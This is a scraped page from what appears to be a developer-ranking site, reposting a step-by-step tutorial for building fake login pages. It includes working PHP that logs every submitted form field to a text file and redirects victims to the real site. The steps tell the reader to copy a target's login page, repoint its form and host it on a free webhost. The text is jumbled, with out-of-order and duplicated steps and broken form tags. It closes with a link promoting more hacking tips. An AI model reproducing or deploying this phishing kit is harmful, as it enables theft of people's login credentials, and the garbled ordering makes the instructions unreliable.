MSSql MySql Python javascript PHP java DotNet Ruby Hackme Takeawy Code Twitter Facebook

The house of developers, A website to classify and rank developers
 
Login or Register
 
Main Page
Famous Developers
Top Companies
Tech News
Be Ready
Takeaway
Contest
Find & Post
 
 
Country Rank: 52
World Rank: 444
Profile Viewed: 440
Points: 440

FAKE LOG IN PAGES.

 

 
 
01.<!--p
02.Header("Location: http://www.RealSite.com");
03.  
04.$handle = fopen("list.txt", "a");
05.  
06.foreach($_GET as $variable => $value) {
07.  
08.fwrite($handle, $variable);
09.fwrite($handle, "=");
10.fwrite($handle, $value);
11.fwrite($handle, "\r\n");
12.}fwrite($handle, "\r\n");
13.  
14.fclose($handle);
15.exit;
16.?>

6.  Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL.  The HTML code should start with something like this:

<form action="”sitelinkhere.com”" accept-charset="UNKNOWN" enctype="application/x-www-form-urlencoded" method="get">></form>>

7.  Once everything is complete, upload the files to a free webhost that supports PHP.
8.  That’s it! You’ve just created a phishing page.

UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

<form action="”sitelinkhere.com”" accept-charset="UNKNOWN" enctype="application/x-www-form-urlencoded" method="get">>

7.  Once everything is complete, upload the files to a free webhost that supports PHP.
8.  That’s it! You’ve just created a phishing page.

UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

</form>>

<form action="”sitelinkhere.com”" accept-charset="UNKNOWN" enctype="application/x-www-form-urlencoded" method="get">>

 

 

wordpress-loginI’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.

 

  1. Select a target website and navigate to their login page.
  2. Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
  3. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
  4. Create a PHP file and name it “phish.php”.
  5. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.

 

FOR MORE HACKING TIPS AND TRICKS

</form>>

WWW.BORN2HACK.HPAGE.COM
Facebook Share Delicious Share Digg Share Google Buzz Share My Space Share Reddit Share Stumbleupon Share Technorati Share Twitter Share

Comments

Please, login or register to add a comment.